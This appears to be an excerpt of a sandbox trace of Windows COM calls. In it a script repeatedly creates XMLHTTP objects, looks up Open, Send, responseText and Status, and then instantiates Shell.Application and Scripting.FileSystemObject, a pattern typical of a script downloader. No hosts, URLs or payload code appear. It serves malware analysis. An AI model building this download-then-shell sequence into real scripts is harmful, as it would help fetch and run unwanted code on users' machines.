	[0479.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0479.972] ??2@YAPEAX_K@Z () returned 0x62f330
	[0479.972] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f330) 
	[0479.972] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0479.972] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0479.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0479.972] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0479.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0479.972] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0479.972] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0479.972] longjmp () 
	[0479.973] longjmp () 
	[0479.973] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0479.973] SysStringLen (param_1=0x0) returned 0x0
	[0479.973] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0479.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0479.973] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0479.973] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0479.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0479.973] ??2@YAPEAX_K@Z () returned 0x62f310
	[0479.973] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0479.973] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0479.973] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0479.973] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0479.973] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0479.974] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0479.974] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0479.974] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0479.974] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0479.974] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0479.974] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0481.999] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0482.000] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0482.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0482.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0482.000] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0482.000] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0482.000] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0482.000] SysStringLen (param_1=0x0) returned 0x0
	[0482.000] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0482.001] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0482.001] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0482.001] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0482.001] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0482.001] ??2@YAPEAX_K@Z () returned 0x62f350
	[0482.001] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0482.001] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0482.001] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0482.001] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0482.001] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0482.001] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0482.002] SysStringLen (param_1=0x0) returned 0x0
	[0482.002] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0482.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0482.005] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0482.005] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0482.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0482.005] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0482.006] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0483.358] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0483.358] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0483.358] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0483.359] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0483.359] SysStringLen (param_1=0x0) returned 0x0
	[0483.359] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0483.360] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0483.360] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0483.360] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0483.360] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0483.360] ??2@YAPEAX_K@Z () returned 0x62f310
	[0483.360] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f310) 
	[0483.360] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0483.360] XMLHTTPRequest:IUnknown:Release (This=0x49c7878) returned 0x0
	[0483.360] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0483.360] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0483.360] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0483.360] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0483.362] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0483.362] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0483.362] SysStringLen (param_1=0x0) returned 0x0
	[0483.362] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0483.362] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0483.363] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0483.363] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0483.363] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c08) returned 0x0
	[0483.363] ??2@YAPEAX_K@Z () returned 0x62f330
	[0483.363] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c08, pUnkSite=0x62f330) 
	[0483.363] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0483.363] XMLHTTPRequest:IUnknown:Release (This=0x49c5c08) returned 0x0
	[0483.363] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5ba0) returned 0x0
	[0483.363] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5ba0) returned 0x3
	[0483.363] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0483.363] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0483.363] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0483.363] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0483.363] SysStringLen (param_1=0x0) returned 0x0
	[0483.363] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0483.363] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0483.363] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0483.364] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
